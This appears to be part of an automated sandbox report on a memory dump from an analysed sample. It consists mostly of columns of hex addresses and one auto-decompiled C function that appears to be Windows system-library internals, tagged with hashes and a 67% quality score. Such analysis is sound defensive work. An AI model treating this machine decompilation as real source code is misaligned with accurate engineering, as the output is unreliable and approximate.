                                                                                                    0x00a9d634
                                                                                                    0x00a9d634
                                                                                                    0x00a9d634
                                                                                                    0x00a9d634
                                                                                                    0x00a9d640
                                                                                                    0x00a9d8bf
                                                                                                    0x00000000
                                                                                                    0x00a9d646
                                                                                                    0x00a9d646
                                                                                                    0x00a9d64d
                                                                                                    0x00a9d652
                                                                                                    0x00aeb2fc
                                                                                                    0x00aeb2fc
                                                                                                    0x00aeb302
                                                                                                    0x00aeb33b
                                                                                                    0x00aeb341
                                                                                                    0x00000000
                                                                                                    0x00aeb304
                                                                                                    0x00aeb304
                                                                                                    0x00aeb319
                                                                                                    0x00aeb31e
                                                                                                    0x00aeb324
                                                                                                    0x00aeb326
                                                                                                    0x00aeb332
                                                                                                    0x00aeb347
                                                                                                    0x00aeb34c
                                                                                                    0x00aeb351
                                                                                                    0x00aeb35a
                                                                                                    0x00000000
                                                                                                    0x00aeb328
                                                                                                    0x00aeb328
                                                                                                    0x00000000
                                                                                                    0x00aeb328
                                                                                                    0x00aeb326
                                                                                                    0x00a9d658
                                                                                                    0x00a9d658
                                                                                                    0x00a9d65b
                                                                                                    0x00a9d665
                                                                                                    0x00000000
                                                                                                    0x00a9d66b
                                                                                                    0x00a9d66b
                                                                                                    0x00a9d66b
                                                                                                    0x00a9d66b
                                                                                                    0x00a9d66d
                                                                                                    0x00a9d672
                                                                                                    0x00a9d67a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9d680
                                                                                                    0x00a9d686
                                                                                                    0x00a9d8ce
                                                                                                    0x00a9d8d4
                                                                                                    0x00a9d8dd
                                                                                                    0x00a9d8e0
                                                                                                    0x00a9d68c
                                                                                                    0x00a9d691
                                                                                                    0x00a9d69d
                                                                                                    0x00a9d6a2
                                                                                                    0x00a9d6a7
                                                                                                    0x00a9d6b0
                                                                                                    0x00a9d6b5
                                                                                                    0x00a9d6e0
                                                                                                    0x00a9d6b7
                                                                                                    0x00a9d6b7
                                                                                                    0x00a9d6b9
                                                                                                    0x00a9d6b9
                                                                                                    0x00a9d6bb
                                                                                                    0x00a9d6bd
                                                                                                    0x00a9d6ce
                                                                                                    0x00a9d6d0
                                                                                                    0x00a9d6d2
                                                                                                    0x00aeb363
                                                                                                    0x00aeb365
                                                                                                    0x00000000
                                                                                                    0x00aeb36b
                                                                                                    0x00000000
                                                                                                    0x00aeb36b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9d6bf
                                                                                                    0x00a9d6bf
                                                                                                    0x00a9d6e5
                                                                                                    0x00a9d6e7
                                                                                                    0x00a9d6e9
                                                                                                    0x00a9d6ec
                                                                                                    0x00a9d6ec
                                                                                                    0x00a9d6ef
                                                                                                    0x00a9d6f5
                                                                                                    0x00a9d6f9
                                                                                                    0x00a9d6fb
                                                                                                    0x00a9d6fd
                                                                                                    0x00a9d701
                                                                                                    0x00a9d703
                                                                                                    0x00a9d70a
                                                                                                    0x00a9d70a
                                                                                                    0x00a9d701
                                                                                                    0x00a9d710
                                                                                                    0x00a9d710
                                                                                                    0x00a9d6c1
                                                                                                    0x00a9d6c1
                                                                                                    0x00a9d6c6
                                                                                                    0x00aeb36d
                                                                                                    0x00aeb36f
                                                                                                    0x00000000
                                                                                                    0x00aeb375
                                                                                                    0x00aeb375
                                                                                                    0x00aeb375
                                                                                                    0x00000000
                                                                                                    0x00aeb375
                                                                                                    0x00000000
                                                                                                    0x00a9d6cc
                                                                                                    0x00a9d6d8
                                                                                                    0x00a9d6d8
                                                                                                    0x00a9d6d8
                                                                                                    0x00000000
                                                                                                    0x00a9d6c6
                                                                                                    0x00a9d6bf
                                                                                                    0x00000000
                                                                                                    0x00a9d6da
                                                                                                    0x00a9d6da
                                                                                                    0x00a9d716
                                                                                                    0x00a9d71b
                                                                                                    0x00a9d720
                                                                                                    0x00a9d726
                                                                                                    0x00a9d726
                                                                                                    0x00a9d72d
                                                                                                    0x00000000
                                                                                                    0x00a9d733
                                                                                                    0x00a9d739
                                                                                                    0x00a9d742
                                                                                                    0x00a9d750
                                                                                                    0x00a9d758
                                                                                                    0x00a9d764
                                                                                                    0x00a9d776
                                                                                                    0x00a9d77a
                                                                                                    0x00a9d783
                                                                                                    0x00a9d928
                                                                                                    0x00a9d92c
                                                                                                    0x00a9d93d
                                                                                                    0x00a9d944
                                                                                                    0x00a9d94f
                                                                                                    0x00a9d954
                                                                                                    0x00a9d956
                                                                                                    0x00a9d95f
                                                                                                    0x00a9d961
                                                                                                    0x00a9d973
                                                                                                    0x00a9d973
                                                                                                    0x00a9d956
                                                                                                    0x00a9d944
                                                                                                    0x00a9d92c
                                                                                                    0x00a9d78b
                                                                                                    0x00aeb394
                                                                                                    0x00a9d791
                                                                                                    0x00a9d798
                                                                                                    0x00aeb3a3
                                                                                                    0x00aeb3bb
                                                                                                    0x00aeb3bb
                                                                                                    0x00a9d7a5
                                                                                                    0x00a9d866
                                                                                                    0x00a9d870
                                                                                                    0x00a9d884
                                                                                                    0x00a9d892
                                                                                                    0x00a9d898
                                                                                                    0x00a9d89e
                                                                                                    0x00a9d8a0
                                                                                                    0x00a9d8a6
                                                                                                    0x00a9d8ac
                                                                                                    0x00a9d8ae
                                                                                                    0x00a9d8b4
                                                                                                    0x00a9d8b4
                                                                                                    0x00a9d8ae
                                                                                                    0x00a9d7a5
                                                                                                    0x00a9d78b
                                                                                                    0x00a9d7b1
                                                                                                    0x00aeb3c5
                                                                                                    0x00aeb3c5
                                                                                                    0x00a9d7c3
                                                                                                    0x00a9d7ca
                                                                                                    0x00a9d7e5
                                                                                                    0x00a9d7eb
                                                                                                    0x00a9d8eb
                                                                                                    0x00a9d8ed
                                                                                                    0x00000000
                                                                                                    0x00a9d8f3
                                                                                                    0x00a9d8f3
                                                                                                    0x00a9d8f3
                                                                                                    0x00000000
                                                                                                    0x00a9d8ed
                                                                                                    0x00a9d7cc
                                                                                                    0x00a9d7cc
                                                                                                    0x00a9d7d2
                                                                                                    0x00000000
                                                                                                    0x00a9d7d4
                                                                                                    0x00a9d7d4
                                                                                                    0x00a9d7d7
                                                                                                    0x00a9d7df
                                                                                                    0x00aeb3d4
                                                                                                    0x00aeb3d9
                                                                                                    0x00aeb3dc
                                                                                                    0x00aeb3dc
                                                                                                    0x00aeb3df
                                                                                                    0x00aeb3e2
                                                                                                    0x00aeb468
                                                                                                    0x00aeb46d
                                                                                                    0x00aeb46f
                                                                                                    0x00aeb46f
                                                                                                    0x00aeb475
                                                                                                    0x00a9d8f8
                                                                                                    0x00a9d8f9
                                                                                                    0x00a9d8fd
                                                                                                    0x00aeb3e8
                                                                                                    0x00aeb3e8
                                                                                                    0x00aeb3eb
                                                                                                    0x00aeb3ed
                                                                                                    0x00000000
                                                                                                    0x00aeb3ef
                                                                                                    0x00aeb3ef
                                                                                                    0x00aeb3f1
                                                                                                    0x00aeb3f4
                                                                                                    0x00aeb3fe
                                                                                                    0x00aeb404
                                                                                                    0x00aeb409
                                                                                                    0x00aeb40e
                                                                                                    0x00aeb410
                                                                                                    0x00aeb410
                                                                                                    0x00aeb414
                                                                                                    0x00aeb414
                                                                                                    0x00aeb41b
                                                                                                    0x00aeb420
                                                                                                    0x00aeb423
                                                                                                    0x00aeb425
                                                                                                    0x00aeb427
                                                                                                    0x00aeb42a
                                                                                                    0x00aeb42d
                                                                                                    0x00aeb42d
                                                                                                    0x00aeb42a
                                                                                                    0x00aeb432
                                                                                                    0x00aeb436
                                                                                                    0x00aeb438
                                                                                                    0x00aeb43b
                                                                                                    0x00aeb43b
                                                                                                    0x00aeb449
                                                                                                    0x00aeb44e
                                                                                                    0x00aeb454
                                                                                                    0x00aeb458
                                                                                                    0x00aeb458
                                                                                                    0x00aeb45d
                                                                                                    0x00000000
                                                                                                    0x00aeb45d
                                                                                                    0x00aeb3ed
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9d7df
                                                                                                    0x00a9d7d2
                                                                                                    0x00a9d7ca
                                                                                                    0x00aeb37c
                                                                                                    0x00aeb37e
                                                                                                    0x00aeb385
                                                                                                    0x00aeb38a
                                                                                                    0x00000000
                                                                                                    0x00aeb38a
                                                                                                    0x00a9d742
                                                                                                    0x00a9d7f1
                                                                                                    0x00a9d7f8
                                                                                                    0x00aeb49b
                                                                                                    0x00aeb49b
                                                                                                    0x00a9d800
                                                                                                    0x00a9d837
                                                                                                    0x00a9d843
                                                                                                    0x00a9d845
                                                                                                    0x00a9d847
                                                                                                    0x00a9d84a
                                                                                                    0x00a9d84b
                                                                                                    0x00a9d84e
                                                                                                    0x00a9d857
                                                                                                    0x00a9d802
                                                                                                    0x00a9d802
                                                                                                    0x00a9d80d
                                                                                                    0x00000000
                                                                                                    0x00a9d818
                                                                                                    0x00a9d818
                                                                                                    0x00a9d824
                                                                                                    0x00a9d831
                                                                                                    0x00aeb4a5
                                                                                                    0x00aeb4ab
                                                                                                    0x00aeb4b3
                                                                                                    0x00aeb4b8
                                                                                                    0x00aeb4bb
                                                                                                    0x00000000
                                                                                                    0x00aeb4c1
                                                                                                    0x00aeb4c1
                                                                                                    0x00aeb4c8
                                                                                                    0x00000000
                                                                                                    0x00aeb4ce
                                                                                                    0x00aeb4d4
                                                                                                    0x00aeb4e1
                                                                                                    0x00aeb4e3
                                                                                                    0x00aeb4e5
                                                                                                    0x00000000
                                                                                                    0x00aeb4eb
                                                                                                    0x00aeb4f0
                                                                                                    0x00aeb4f2
                                                                                                    0x00a9dac9
                                                                                                    0x00a9dacc
                                                                                                    0x00a9dacf
                                                                                                    0x00a9dad1
                                                                                                    0x00a9dd78
                                                                                                    0x00a9dd78
                                                                                                    0x00a9dcf2
                                                                                                    0x00000000
                                                                                                    0x00a9dad7
                                                                                                    0x00a9dad9
                                                                                                    0x00a9dadb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9dae1
                                                                                                    0x00a9dae1
                                                                                                    0x00a9dae4
                                                                                                    0x00a9dae6
                                                                                                    0x00aeb4f9
                                                                                                    0x00aeb4f9
                                                                                                    0x00aeb500
                                                                                                    0x00a9daec
                                                                                                    0x00a9daec
                                                                                                    0x00a9daf5
                                                                                                    0x00a9daf8
                                                                                                    0x00a9dafb
                                                                                                    0x00a9db03
                                                                                                    0x00a9db11
                                                                                                    0x00a9db16
                                                                                                    0x00a9db19
                                                                                                    0x00a9db1b
                                                                                                    0x00aeb52c
                                                                                                    0x00aeb531
                                                                                                    0x00aeb534
                                                                                                    0x00a9db21
                                                                                                    0x00a9db21
                                                                                                    0x00a9db24
                                                                                                    0x00a9dcd9
                                                                                                    0x00a9dce2
                                                                                                    0x00a9dce5
                                                                                                    0x00a9dd6a
                                                                                                    0x00a9dd6d
                                                                                                    0x00000000
                                                                                                    0x00a9dd73
                                                                                                    0x00aeb51a
                                                                                                    0x00aeb51c
                                                                                                    0x00aeb51f
                                                                                                    0x00aeb524
                                                                                                    0x00000000
                                                                                                    0x00aeb524
                                                                                                    0x00a9dce7
                                                                                                    0x00a9dce7
                                                                                                    0x00a9dce7
                                                                                                    0x00000000
                                                                                                    0x00a9dce7
                                                                                                    0x00000000
                                                                                                    0x00a9db2a
                                                                                                    0x00a9db2c
                                                                                                    0x00a9db31
                                                                                                    0x00a9db33
                                                                                                    0x00a9db36
                                                                                                    0x00a9db39
                                                                                                    0x00a9db3b
                                                                                                    0x00a9db66
                                                                                                    0x00a9db66
                                                                                                    0x00a9db3d
                                                                                                    0x00a9db3d
                                                                                                    0x00a9db3e
                                                                                                    0x00a9db46
                                                                                                    0x00a9db47
                                                                                                    0x00a9db49
                                                                                                    0x00a9db4c
                                                                                                    0x00a9db53
                                                                                                    0x00a9db55
                                                                                                    0x00a9db58
                                                                                                    0x00a9db5a
                                                                                                    0x00aeb50a
                                                                                                    0x00aeb50f
                                                                                                    0x00aeb512
                                                                                                    0x00a9db60
                                                                                                    0x00a9db60
                                                                                                    0x00a9db63
                                                                                                    0x00a9db63
                                                                                                    0x00000000
                                                                                                    0x00a9db63
                                                                                                    0x00a9db5a
                                                                                                    0x00a9db3b
                                                                                                    0x00a9db24
                                                                                                    0x00a9db69
                                                                                                    0x00a9db69
                                                                                                    0x00a9db6c
                                                                                                    0x00a9db6f
                                                                                                    0x00a9db74
                                                                                                    0x00aeb557
                                                                                                    0x00aeb557
                                                                                                    0x00aeb55e
                                                                                                    0x00a9db7a
                                                                                                    0x00a9db7c
                                                                                                    0x00a9db7f
                                                                                                    0x00a9db82
                                                                                                    0x00a9db85
                                                                                                    0x00000000
                                                                                                    0x00a9db8b
                                                                                                    0x00a9db8b
                                                                                                    0x00a9db8d
                                                                                                    0x00a9db9b
                                                                                                    0x00a9db9b
                                                                                                    0x00a9db9d
                                                                                                    0x00a9dba0
                                                                                                    0x00a9dba2
                                                                                                    0x00a9dba4
                                                                                                    0x00a9dba7
                                                                                                    0x00a9dba9
                                                                                                    0x00a9dbae
                                                                                                    0x00a9dbae
                                                                                                    0x00a9dbb1
                                                                                                    0x00a9dbb4
                                                                                                    0x00a9dbb4
                                                                                                    0x00a9dbb7
                                                                                                    0x00a9dbba
                                                                                                    0x00a9dcd2
                                                                                                    0x00a9dcd4
                                                                                                    0x00000000
                                                                                                    0x00a9dbc0
                                                                                                    0x00a9dbc0
                                                                                                    0x00a9dbd2
                                                                                                    0x00a9dbd7
                                                                                                    0x00a9dbda
                                                                                                    0x00a9dbdd
                                                                                                    0x00a9dbdf
                                                                                                    0x00000000
                                                                                                    0x00a9dbe5
                                                                                                    0x00a9dbe5
                                                                                                    0x00a9dbee
                                                                                                    0x00a9dbf1
                                                                                                    0x00aeb541
                                                                                                    0x00aeb544
                                                                                                    0x00000000
                                                                                                    0x00aeb546
                                                                                                    0x00aeb546
                                                                                                    0x00000000
                                                                                                    0x00aeb546
                                                                                                    0x00a9dbf7
                                                                                                    0x00a9dbf7
                                                                                                    0x00a9dbfd
                                                                                                    0x00a9dbfd
                                                                                                    0x00a9dbff
                                                                                                    0x00a9dc0b
                                                                                                    0x00a9dc15
                                                                                                    0x00a9dc1b
                                                                                                    0x00a9dc1d
                                                                                                    0x00a9dc21
                                                                                                    0x00a9dc21
                                                                                                    0x00a9dc23
                                                                                                    0x00a9dc23
                                                                                                    0x00a9dc26
                                                                                                    0x00a9dc29
                                                                                                    0x00a9dc2b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9dc31
                                                                                                    0x00a9dc34
                                                                                                    0x00a9dc36
                                                                                                    0x00a9dcbf
                                                                                                    0x00a9dcbf
                                                                                                    0x00a9dcc2
                                                                                                    0x00000000
                                                                                                    0x00a9dc3c
                                                                                                    0x00a9dc41
                                                                                                    0x00a9dc43
                                                                                                    0x00000000
                                                                                                    0x00a9dc45
                                                                                                    0x00a9dc45
                                                                                                    0x00a9dc47
                                                                                                    0x00000000
                                                                                                    0x00a9dc4d
                                                                                                    0x00a9dc4d
                                                                                                    0x00a9dc50
                                                                                                    0x00a9dc52
                                                                                                    0x00a9dc55
                                                                                                    0x00a9dcfa
                                                                                                    0x00a9dcfe
                                                                                                    0x00a9dd08
                                                                                                    0x00a9dd0a
                                                                                                    0x00a9dd0c
                                                                                                    0x00000000
                                                                                                    0x00a9dd12
                                                                                                    0x00a9dd15
                                                                                                    0x00a9dd2d
                                                                                                    0x00a9dd2f
                                                                                                    0x00a9dd32
                                                                                                    0x00a9dd35
                                                                                                    0x00000000
                                                                                                    0x00a9dd35
                                                                                                    0x00a9dc5b
                                                                                                    0x00a9dc5b
                                                                                                    0x00a9dc5e
                                                                                                    0x00a9dc61
                                                                                                    0x00a9dc64
                                                                                                    0x00a9dc67
                                                                                                    0x00a9dc67
                                                                                                    0x00a9dc6a
                                                                                                    0x00a9dc6c
                                                                                                    0x00a9dc8e
                                                                                                    0x00a9dc8e
                                                                                                    0x00a9dc91
                                                                                                    0x00a9dc93
                                                                                                    0x00a9dcce
                                                                                                    0x00a9dcce
                                                                                                    0x00a9dc95
                                                                                                    0x00a9dc9c
                                                                                                    0x00a9dc6e
                                                                                                    0x00a9dc72
                                                                                                    0x00a9dc75
                                                                                                    0x00a9dc77
                                                                                                    0x00a9dc79
                                                                                                    0x00aeb551
                                                                                                    0x00aeb551
                                                                                                    0x00000000
                                                                                                    0x00a9dc7f
                                                                                                    0x00a9dc7f
                                                                                                    0x00a9dc81
                                                                                                    0x00000000
                                                                                                    0x00a9dc83
                                                                                                    0x00a9dc86
                                                                                                    0x00a9dc88
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9dc88
                                                                                                    0x00a9dc81
                                                                                                    0x00a9dc79
                                                                                                    0x00a9dc6c
                                                                                                    0x00a9dc55
                                                                                                    0x00a9dc47
                                                                                                    0x00a9dc43
                                                                                                    0x00000000
                                                                                                    0x00a9dc36
                                                                                                    0x00a9dc23
                                                                                                    0x00000000
                                                                                                    0x00a9dbff
                                                                                                    0x00a9dbf1
                                                                                                    0x00a9dbdf
                                                                                                    0x00a9db8f
                                                                                                    0x00a9db92
                                                                                                    0x00a9db95
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9db95
                                                                                                    0x00a9db8d
                                                                                                    0x00a9db85
                                                                                                    0x00a9db74
                                                                                                    0x00a9dc9f
                                                                                                    0x00a9dca2
                                                                                                    0x00a9dcb0
                                                                                                    0x00a9dcb0
                                                                                                    0x00a9dad1
                                                                                                    0x00aeb4e5
                                                                                                    0x00aeb4c8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a9d831
                                                                                                    0x00a9d80d
                                                                                                    0x00000000
                                                                                                    0x00a9d800
                                                                                                    0x00aeb47f
                                                                                                    0x00aeb485
                                                                                                    0x00000000
                                                                                                    0x00aeb485
                                                                                                    0x00a9d665
                                                                                                    0x00a9d652
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: DebugPrintTimes
                                                                                                    • String ID:
                                                                                                    • API String ID: 3446177414-0
                                                                                                    • Opcode ID: 39aa5de7766145afe23c51dfa90e6b8a4de42f69af5c8249fd7d9d5d169b7b94
                                                                                                    • Instruction ID: c0ca3bf3b950b8490c4b29e82f19d92261e87d9d305669020556e0e92845b589
                                                                                                    • Opcode Fuzzy Hash: 39aa5de7766145afe23c51dfa90e6b8a4de42f69af5c8249fd7d9d5d169b7b94
                                                                                                    • Instruction Fuzzy Hash: A5E1AF30B003598FDF24DF29C985BAAB7F2BF45304F1441A9E909AB292DB749D81CF61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AB513A, Relevance: 1.8, APIs: 1, Instructions: 258timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 67%
                                                                                                    			E00AB513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0xb7d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E00ACD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E00AA2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L00AA4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E00ACF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E00A9FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0xb7b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E00ACB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                                    0x00ab5142
                                                                                                    0x00ab514c
                                                                                                    0x00ab5150
                                                                                                    0x00ab5157
                                                                                                    0x00ab5159
                                                                                                    0x00ab515e
                                                                                                    0x00ab5165
                                                                                                    0x00ab5169
                                                                                                    0x00ab516c
                                                                                                    0x00ab5172
                                                                                                    0x00ab5176
                                                                                                    0x00ab517a
                                                                                                    0x00ab517a
                                                                                                    0x00ab517a
                                                                                                    0x00ab517f
                                                                                                    0x00af6d8b
                                                                                                    0x00af6d8e
                                                                                                    0x00af6d91
                                                                                                    0x00af6d95
                                                                                                    0x00af6d98
                                                                                                    0x00af6d9c
                                                                                                    0x00af6da0
                                                                                                    0x00af6da3
                                                                                                    0x00af6da7
                                                                                                    0x00af6e26
                                                                                                    0x00af6e26
                                                                                                    0x00af6e2a
                                                                                                    0x00ab51f9
                                                                                                    0x00ab51f9
                                                                                                    0x00ab51fe
                                                                                                    0x00af6e33
                                                                                                    0x00af6e33
                                                                                                    0x00af6e39
                                                                                                    0x00af6e3d
                                                                                                    0x00af6e46
                                                                                                    0x00af6e50
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af6e52
                                                                                                    0x00af6e53
                                                                                                    0x00af6e56
                                                                                                    0x00af6e5d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af6e5f
                                                                                                    0x00af6e67
                                                                                                    0x00af6e77
                                                                                                    0x00af6e7f
                                                                                                    0x00af6e80
                                                                                                    0x00af6e88
                                                                                                    0x00af6e90
                                                                                                    0x00af6e9f
                                                                                                    0x00af6ea5
                                                                                                    0x00af6ea9
                                                                                                    0x00af6eb1
                                                                                                    0x00af6ebf
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af6ecf
                                                                                                    0x00af6ed3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af6edb
                                                                                                    0x00af6ede
                                                                                                    0x00af6ee1
                                                                                                    0x00af6ee8
                                                                                                    0x00af6eeb
                                                                                                    0x00af6eed
                                                                                                    0x00af6ef0
                                                                                                    0x00af6ef4
                                                                                                    0x00af6ef8
                                                                                                    0x00af6efc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af6f0d
                                                                                                    0x00af6f11
                                                                                                    0x00af6f32
                                                                                                    0x00af6f37
                                                                                                    0x00af6f3b
                                                                                                    0x00af6f3e
                                                                                                    0x00af6f41
                                                                                                    0x00af6f46
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00af6f4c
                                                                                                    0x00af6f50
                                                                                                    0x00af6f50
                                                                                                    0x00af6f54
                                                                                                    0x00af6f62
                                                                                                    0x00af6f65
                                                                                                    0x00af6f6d
                                                                                                    0x00af6f7b
                                                                                                    0x00af6f7b
                                                                                                    0x00af6f93
                                                                                                    0x00af6f98
                                                                                                    0x00af6fa0
                                                                                                    0x00af6fa6
                                                                                                    0x00af6fb3
                                                                                                    0x00af6fb6
                                                                                                    0x00af6fbf
                                                                                                    0x00af6fc1
                                                                                                    0x00af6fd5
                                                                                                    0x00af6fda
                                                                                                    0x00af6fda
